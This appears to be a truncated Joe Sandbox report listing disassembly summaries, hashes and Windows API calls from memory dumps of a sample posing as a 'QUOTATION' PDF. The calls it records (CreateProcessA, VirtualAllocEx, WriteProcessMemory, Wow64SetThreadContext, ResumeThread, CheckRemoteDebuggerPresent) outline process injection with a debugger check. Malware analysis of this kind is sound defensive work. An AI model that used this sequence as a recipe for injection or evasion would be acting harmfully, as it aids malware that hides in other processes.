                            • Opcode ID: fc6500bdb7dc091b388877d6d433399a071592dad55d6f5d87b0b23753fdfdcc
                            • Instruction ID: ad5115e11ef6fd1d9e6be87869dc1f07625cf205fa93806d81c365ebe0b30c6b
                            • Opcode Fuzzy Hash: fc6500bdb7dc091b388877d6d433399a071592dad55d6f5d87b0b23753fdfdcc
                            • Instruction Fuzzy Hash: 4F51D075D05208DBDB56CFAAD4587EDBBB6FF4A304F149029D80AA7380D7789D86CB10
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f56e3f792365a29db5f0dad0bb7cb6c64fa49b4362bee61c777f8cdcc6746221
                            • Instruction ID: 8cff60dc294c6741faecd9fa0167536aec801d833b1efe1ccf47161e9be8f413
                            • Opcode Fuzzy Hash: f56e3f792365a29db5f0dad0bb7cb6c64fa49b4362bee61c777f8cdcc6746221
                            • Instruction Fuzzy Hash: C751D075D05208CBDB56CFAAD458BEDBBB6FF4A304F109029D80AA7394D778AD85CB10
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1ea1cd20ca7320062af17f14191498395bfebefa2bafac7bbb6010ed6b922421
                            • Instruction ID: e2f56da2f21bad3122a5d5490cec94f9b4fb54fe4fb805180b1f529323d76336
                            • Opcode Fuzzy Hash: 1ea1cd20ca7320062af17f14191498395bfebefa2bafac7bbb6010ed6b922421
                            • Instruction Fuzzy Hash: 9651C374A01218DFEB54CF28D855BA9BBF1FB49705F0081B9E80AA7791DB39AD85CF01

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 2dd5cc0-2dd5cc7 1 2dd5ccd-2dd5cef 0->1 2 2dd5388-2dd53c9 0->2 3 2dd5cf5-2dd5d00 1->3 4 2dd51d2-2dd51db 1->4 16 2dd53cc call 2db7879 2->16 17 2dd53cc call 2db7880 2->17 3->4 6 2dd51dd-2dd523e 4->6 7 2dd51e4-2dd6148 4->7 6->4 12 2dd5240-2dd524b 6->12 7->4 12->4 14 2dd53ce-2dd5409 14->4 15 2dd540f-2dd541a 14->15 15->4 16->14 17->14
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: %$,$/
                            • API String ID: 0-2336033915
                            • Opcode ID: e7253efb93df14b7275be60061abf1c83f7d69eb332bcdcccbbd7c8880a6d276
                            • Instruction ID: 5acf8b82a0cd27407f497b4a29c5c2d0159fe5c4925e2fa15ad65ccff1a325a6
                            • Opcode Fuzzy Hash: e7253efb93df14b7275be60061abf1c83f7d69eb332bcdcccbbd7c8880a6d276
                            • Instruction Fuzzy Hash: E621AF74900668CFDB65CF54E948BECBBB2BB48305F5484EAD509AB250CB795ED5CF00

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 18 2dd57eb-2dd57ef 19 2dd59e5-2dd59fb 18->19 20 2dd57f5-2dd5817 18->20 31 2dd59fe call 2db7198 19->31 32 2dd59fe call 2db71a0 19->32 21 2dd581d-2dd5828 20->21 22 2dd51d2-2dd51db 20->22 21->22 24 2dd51dd-2dd523e 22->24 25 2dd51e4-2dd6148 22->25 23 2dd5a00-2dd5a38 23->22 26 2dd5a3e-2dd5a49 23->26 24->22 30 2dd5240-2dd524b 24->30 25->22 26->22 30->22 31->23 32->23
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: >$C
                            • API String ID: 0-3481919492
                            • Opcode ID: 53dd0276c1e9ac304d66f9e946879f966ee629cefb302195ec13f18c832f9910
                            • Instruction ID: 5fa7a009eef19bea70e5f661dafa2f86c62fe4f839942ab9dc2eb003a73ede6a
                            • Opcode Fuzzy Hash: 53dd0276c1e9ac304d66f9e946879f966ee629cefb302195ec13f18c832f9910
                            • Instruction Fuzzy Hash: 0D119D74956668CFEB20CF14D948BE8B7B2FB09314F9485EAC419A7381C3799E96CF00

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 33 2dd5ca6-2dd5caa 34 2dd549d-2dd54d6 33->34 35 2dd5cb0-2dd5cba 33->35 48 2dd54d9 call 2dd7749 34->48 49 2dd54d9 call 2dd7758 34->49 39 2dd54df-2dd550d 40 2dd5513-2dd551e 39->40 41 2dd51d2-2dd51db 39->41 40->41 42 2dd51dd-2dd523e 41->42 43 2dd51e4-2dd6148 41->43 42->41 47 2dd5240-2dd524b 42->47 43->41 47->41 48->39 49->39
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: &$)
                            • API String ID: 0-1893440138
                            • Opcode ID: 789dbc98d5180fa3afc990d76198e3cce2f9f8b224a150db6445510f31958a53
                            • Instruction ID: f8e6339fd0d322a992049989ece5bbb32cac1a2b9167764c9bfc7c07d011b26f
                            • Opcode Fuzzy Hash: 789dbc98d5180fa3afc990d76198e3cce2f9f8b224a150db6445510f31958a53
                            • Instruction Fuzzy Hash: DA01D370900268CFDB64CF58E994BEDBBB1BB05304F50549AD609B6280CB7A6ED0CF40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 50 2dd545c-2dd5463 51 2dd5469-2dd5489 50->51 52 2dd5c4b-2dd5c52 50->52 53 2dd548f-2dd5498 51->53 54 2dd51d2-2dd51db 51->54 57 2dd5c5c-2dd5c90 52->57 53->54 55 2dd51dd-2dd523e 54->55 56 2dd51e4-2dd6148 54->56 55->54 62 2dd5240-2dd524b 55->62 56->54 57->54 58 2dd5c96-2dd5ca1 57->58 58->54 62->54
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: "$*
                            • API String ID: 0-4007355372
                            • Opcode ID: 87a2896159d2db7a7e4be99dc2273158dc04e3e8cb89ee377f6af5c78276c8b7
                            • Instruction ID: 424e995d1e44d5a24f401b7f0a9cf14d68fae2902f498608f967fcf0602a231b
                            • Opcode Fuzzy Hash: 87a2896159d2db7a7e4be99dc2273158dc04e3e8cb89ee377f6af5c78276c8b7
                            • Instruction Fuzzy Hash: AB018C70911669CFDB60CF58E948BE9B7F2AB49314F9094E68419A3200D7746EC4CF04

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 63 2dd5f6d-2dd5f74 64 2dd582d-2dd5843 63->64 65 2dd5f7a-2dd5f9c 63->65 76 2dd5846 call 2db7198 64->76 77 2dd5846 call 2db71a0 64->77 67 2dd51d2-2dd51db 65->67 68 2dd5fa2-2dd5fad 65->68 69 2dd51dd-2dd523e 67->69 70 2dd51e4-2dd6148 67->70 68->67 69->67 75 2dd5240-2dd524b 69->75 70->67 71 2dd5848-2dd5862 75->67 76->71 77->71
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6$H
                            • API String ID: 0-1447585844
                            • Opcode ID: caa28b863a6439bcef214b0c8d949cc916d1906ed736b0d29fa0dcd47853d525
                            • Instruction ID: d449c89c08fa218bb6ce3bee27f61e513a445a112d304200879f3caff6b4328b
                            • Opcode Fuzzy Hash: caa28b863a6439bcef214b0c8d949cc916d1906ed736b0d29fa0dcd47853d525
                            • Instruction Fuzzy Hash: 9001CC74805228CFDBA0CF14E988BE8BBF2AB08314F6484EAD519A7240C7799ED5CF00

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 2dd58a7-2dd58ae 79 2dd58b4-2dd58be 78->79 80 2dd5523-2dd5550 78->80 85 2dd5556 call 2dd7841 80->85 86 2dd5556 call 2dd7850 80->86 84 2dd555c-2dd556c 85->84 86->84
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;$A
                            • API String ID: 0-659309507
                            • Opcode ID: 108d049fe12c15a0de12952fa178ba611ec7af7dc42727961487358b0539f0f3
                            • Instruction ID: 56d9eae0c944d67342fccf858516d190212f45b5133459bb167afd7a4224545c
                            • Opcode Fuzzy Hash: 108d049fe12c15a0de12952fa178ba611ec7af7dc42727961487358b0539f0f3
                            • Instruction Fuzzy Hash: DEF0B274904218DFDB64DF20E854BECBBB1AB45300F9094A98489A7340DB745EC4CF11

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 668 2db6e9d-2db6f18 670 2db6f1a-2db6f24 668->670 671 2db6f51-2db6f71 668->671 670->671 672 2db6f26-2db6f28 670->672 678 2db6faa-2db6fe4 671->678 679 2db6f73-2db6f7d 671->679 673 2db6f4b-2db6f4e 672->673 674 2db6f2a-2db6f34 672->674 673->671 676 2db6f38-2db6f47 674->676 677 2db6f36 674->677 676->676 680 2db6f49 676->680 677->676 685 2db701d-2db7092 CreateProcessA 678->685 686 2db6fe6-2db6ff0 678->686 679->678 681 2db6f7f-2db6f81 679->681 680->673 683 2db6f83-2db6f8d 681->683 684 2db6fa4-2db6fa7 681->684 687 2db6f8f 683->687 688 2db6f91-2db6fa0 683->688 684->678 698 2db709b-2db70e3 685->698 699 2db7094-2db709a 685->699 686->685 690 2db6ff2-2db6ff4 686->690 687->688 688->688 689 2db6fa2 688->689 689->684 691 2db7017-2db701a 690->691 692 2db6ff6-2db7000 690->692 691->685 694 2db7002 692->694 695 2db7004-2db7013 692->695 694->695 695->695 697 2db7015 695->697 697->691 704 2db70f3-2db70f7 698->704 705 2db70e5-2db70e9 698->705 699->698 707 2db70f9-2db70fd 704->707 708 2db7107-2db710b 704->708 705->704 706 2db70eb 705->706 706->704 707->708 709 2db70ff 707->709 710 2db711b 708->710 711 2db710d-2db7111 708->711 709->708 713 2db711c 710->713 711->710 712 2db7113 711->712 712->710 713->713
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02DB7082
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 7d88193e03c5b48ca4dcc1d5c44ec04203fa486cc9711f105811af7b4d2a6d09
                            • Instruction ID: b6de0424638c1142e60db673b96e88b8fe6c4fbec5862bacd47188d8c567b59f
                            • Opcode Fuzzy Hash: 7d88193e03c5b48ca4dcc1d5c44ec04203fa486cc9711f105811af7b4d2a6d09
                            • Instruction Fuzzy Hash: 2C813671D00649DFEB11CFA9C8957EEBBF1AF48314F24812AE856A7384DB749881CF91

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 714 2db6ea8-2db6f18 716 2db6f1a-2db6f24 714->716 717 2db6f51-2db6f71 714->717 716->717 718 2db6f26-2db6f28 716->718 724 2db6faa-2db6fe4 717->724 725 2db6f73-2db6f7d 717->725 719 2db6f4b-2db6f4e 718->719 720 2db6f2a-2db6f34 718->720 719->717 722 2db6f38-2db6f47 720->722 723 2db6f36 720->723 722->722 726 2db6f49 722->726 723->722 731 2db701d-2db7092 CreateProcessA 724->731 732 2db6fe6-2db6ff0 724->732 725->724 727 2db6f7f-2db6f81 725->727 726->719 729 2db6f83-2db6f8d 727->729 730 2db6fa4-2db6fa7 727->730 733 2db6f8f 729->733 734 2db6f91-2db6fa0 729->734 730->724 744 2db709b-2db70e3 731->744 745 2db7094-2db709a 731->745 732->731 736 2db6ff2-2db6ff4 732->736 733->734 734->734 735 2db6fa2 734->735 735->730 737 2db7017-2db701a 736->737 738 2db6ff6-2db7000 736->738 737->731 740 2db7002 738->740 741 2db7004-2db7013 738->741 740->741 741->741 743 2db7015 741->743 743->737 750 2db70f3-2db70f7 744->750 751 2db70e5-2db70e9 744->751 745->744 753 2db70f9-2db70fd 750->753 754 2db7107-2db710b 750->754 751->750 752 2db70eb 751->752 752->750 753->754 755 2db70ff 753->755 756 2db711b 754->756 757 2db710d-2db7111 754->757 755->754 759 2db711c 756->759 757->756 758 2db7113 757->758 758->756 759->759
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02DB7082
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: fed00e552a64a64e1fa497e55932b19850690f41fc93eed405ebcbfaf09b5e66
                            • Instruction ID: b4597e8f24b3c9a301e86a0e4abc2f415caeee73434b6c72c2af99075966724d
                            • Opcode Fuzzy Hash: fed00e552a64a64e1fa497e55932b19850690f41fc93eed405ebcbfaf09b5e66
                            • Instruction Fuzzy Hash: A3813571D00249DFEB11CFA9C8957DEBBF1AF48314F24852AE816A7384DB749881CF91

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 760 2db89e8-2db8a74 CheckRemoteDebuggerPresent 763 2db8a7d-2db8ac0 760->763 764 2db8a76-2db8a7c 760->764 764->763
                            APIs
                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02DB8A67
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: d1395a0c95f273ac76f1fb62b90168b9275b06e2666f986a62446d7811da1176
                            • Instruction ID: f7c7d3934bd320ffab2d0e9ad0294a9e163cb97567f8170db796263a0385e94e
                            • Opcode Fuzzy Hash: d1395a0c95f273ac76f1fb62b90168b9275b06e2666f986a62446d7811da1176
                            • Instruction Fuzzy Hash: 65214A729042498FDB14CFAAC444BEEBBF5AF89220F14846AD856A7240C7389A45DFA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 768 2db7879-2db78cb 771 2db78db-2db7914 WriteProcessMemory 768->771 772 2db78cd-2db78d9 768->772 774 2db791d-2db794d 771->774 775 2db7916-2db791c 771->775 772->771 775->774
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02DB7907
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 243aa038f999b6cdc30c0f5bf888280500e966ba9600dfc2f457c021ffd11481
                            • Instruction ID: 9534da9ad75b3483e721a34c5e1a23c1e59df3e35ef1ce2daff5ed3e2a102099
                            • Opcode Fuzzy Hash: 243aa038f999b6cdc30c0f5bf888280500e966ba9600dfc2f457c021ffd11481
                            • Instruction Fuzzy Hash: 3A213976900349DFDB11CFAAC844BEEBBF5EF88324F148429E515A7250D7799944CFA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 779 2db7198-2db71eb 782 2db71fb-2db722b Wow64SetThreadContext 779->782 783 2db71ed-2db71f9 779->783 785 2db722d-2db7233 782->785 786 2db7234-2db7264 782->786 783->782 785->786
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02DB721E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: a189972045da7d3ebbf2349da5399b04262baa35d9c3dcbf96649ba46d297375
                            • Instruction ID: f85fdb5173046a4b4a765e944ab2c4aed9553db220c1d4079d9a6b0853c3e9ee
                            • Opcode Fuzzy Hash: a189972045da7d3ebbf2349da5399b04262baa35d9c3dcbf96649ba46d297375
                            • Instruction Fuzzy Hash: 812128719007098FEB10CFAAC485BEEFBF5EF89324F148429D459A7240DB789945CFA4

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 798 2db7880-2db78cb 800 2db78db-2db7914 WriteProcessMemory 798->800 801 2db78cd-2db78d9 798->801 803 2db791d-2db794d 800->803 804 2db7916-2db791c 800->804 801->800 804->803
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02DB7907
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 14ec1300009af0fdd5b904c2f05c9eab0297e30a14c9b2a63d0849284e8e1049
                            • Instruction ID: 11e6a2a897c67dacc0c8d5963866a3f51ce3f1a2c87f6a7b18211e9ea7e74c14
                            • Opcode Fuzzy Hash: 14ec1300009af0fdd5b904c2f05c9eab0297e30a14c9b2a63d0849284e8e1049
                            • Instruction Fuzzy Hash: 39214876900349DFDB10CFAAC844BEEBBF5EF88320F108429E919A7250C7789940CFA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 808 2db71a0-2db71eb 810 2db71fb-2db722b Wow64SetThreadContext 808->810 811 2db71ed-2db71f9 808->811 813 2db722d-2db7233 810->813 814 2db7234-2db7264 810->814 811->810 813->814
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02DB721E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 3840691da7e53d03f5b7a2ee81549a9a470062e665a0c352bc53f9ba4cef82c1
                            • Instruction ID: bb17b0074fddb6ada6e5f3b7e8373ee72adaa88960b7cf3169bdca8f294e474a
                            • Opcode Fuzzy Hash: 3840691da7e53d03f5b7a2ee81549a9a470062e665a0c352bc53f9ba4cef82c1
                            • Instruction Fuzzy Hash: 202125719003098FDB10CFAAC484BEEBBF5EF88324F148429D419A7240CB789944CFA4

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 818 2dbc408-2dbc477 KiUserCallbackDispatcher 819 2dbc479-2dbc47f 818->819 820 2dbc480-2dbc4b1 818->820 819->820 823 2dbc4ba-2dbc4da 820->823 824 2dbc4b3-2dbc4b9 820->824 824->823
                            APIs
                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 02DBC466
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CallbackDispatcherUser
                            • String ID:
                            • API String ID: 2492992576-0
                            • Opcode ID: dd12aa09f8db867d6e791659c8e711fc8fb8db705a61397c49c9ad39451a15b3
                            • Instruction ID: 34fc9465e4aed2413b5ea7185658676f831a067d6c74e6ac9e6537167d65da21
                            • Opcode Fuzzy Hash: dd12aa09f8db867d6e791659c8e711fc8fb8db705a61397c49c9ad39451a15b3
                            • Instruction Fuzzy Hash: 7921FEB08107498FDB218FA9C9497EAFBF0EF09324F24849AD559A7351C3786984CFA5
                            APIs
                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 02DBC466
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CallbackDispatcherUser
                            • String ID:
                            • API String ID: 2492992576-0
                            • Opcode ID: 754220255a0902228d21e7ebdc0def8e09a643387bd10f72d693facbcbbba5df
                            • Instruction ID: 77b8fce8955805740a46a807a073cd98b428514e84591a9f07211125e5450970
                            • Opcode Fuzzy Hash: 754220255a0902228d21e7ebdc0def8e09a643387bd10f72d693facbcbbba5df
                            • Instruction Fuzzy Hash: C12112B08107498FDB10CF9AC5497EEBBF4AB08324F20845AD519A7350C3B86944CFA5
                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02DB76FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 68cb45a700802bef6cffffd5ab4a3dba641ae1b509505105687f3bff24c99d15
                            • Instruction ID: 4cf6af99f3bd176fc22d6ed653aa054250152d3db85eed6290a6e3bf1a1f3d18
                            • Opcode Fuzzy Hash: 68cb45a700802bef6cffffd5ab4a3dba641ae1b509505105687f3bff24c99d15
                            • Instruction Fuzzy Hash: 741103769006499FDB11DFAAC844BDEBBF5EF88720F248819E915A7250C779A940CFA0
                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02DB76FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: cfbd1a744c49a5abc1c710d9b166ed46b2acea2f453df5b2bb3190a8fd3d66c4
                            • Instruction ID: 06cf676f00e7e7fa2212b65ca0f2ba1f5aa85414a715333c06c9a6c9250119e2
                            • Opcode Fuzzy Hash: cfbd1a744c49a5abc1c710d9b166ed46b2acea2f453df5b2bb3190a8fd3d66c4
                            • Instruction Fuzzy Hash: 32112676900249DFDB11DFAAC844BDFBBF5EF88720F248819E515A7250C7799940CFA0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 43f10b48fc1f2f693bfd462face3bb3798aee1bbb14c70983628f22aa5295910
                            • Instruction ID: b424321f3dc049ff083328960d6783e26e8c7c47eb9704448db473fe8869704b
                            • Opcode Fuzzy Hash: 43f10b48fc1f2f693bfd462face3bb3798aee1bbb14c70983628f22aa5295910
                            • Instruction Fuzzy Hash: 221134719002498FDB10DFAAC844BDEFBF5EF88620F208429D419A7240CB79A940CFA4
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 08a891e46accda18fb3c85ae75912357292122bbbb2a5afa12566b6106a7f9c3
                            • Instruction ID: b77c78bfd53cb618a9fcfc0f3a75c044d1eba1a26bdb112240c8fe151ce9ddfb
                            • Opcode Fuzzy Hash: 08a891e46accda18fb3c85ae75912357292122bbbb2a5afa12566b6106a7f9c3
                            • Instruction Fuzzy Hash: 701116719007488BDB10DFAAC844BDEFBF5EF88624F248419D519A7240CB79A940CFA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e3fabae82e6e5451aa2df969e51625d0d7936e5d6c9050f059c448bd4913c53a
                            • Instruction ID: 1ac287de617332ac1399221fa3b7c8261eed122ec8dae7d4924ace5869269cb7
                            • Opcode Fuzzy Hash: e3fabae82e6e5451aa2df969e51625d0d7936e5d6c9050f059c448bd4913c53a
                            • Instruction Fuzzy Hash: 8E713A70B002149FDB48DB64D854BAEB7B6EF8C714F118469E606AB394CF75DC42CBA8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35af37877231ffd1660148cb67ce867143f407f3dd2e36c6cf8a6d98a510707c
                            • Instruction ID: d3a6e3497b6e64a66aa5e1182b2ca458ed3834e40710336317199870ed88676b
                            • Opcode Fuzzy Hash: 35af37877231ffd1660148cb67ce867143f407f3dd2e36c6cf8a6d98a510707c
                            • Instruction Fuzzy Hash: 5C51BC30700301DFD729AB78D45466E77A6FF85701B2589ADDA069B3A0CF31EC46CBA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8838bbc2f66714b33246a689813d9f98fe3918836117adfb4eedb9f4cb1cb075
                            • Instruction ID: 3ba235406cab1256c3b43cee92ee6bcc8c97f6a82268e8b1cca84b700a2f7e28
                            • Opcode Fuzzy Hash: 8838bbc2f66714b33246a689813d9f98fe3918836117adfb4eedb9f4cb1cb075
                            • Instruction Fuzzy Hash: CB611934B506189FCB44DF68C494AADB7B6FF89710F1581A9E9069B361CB30EC42CF94
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
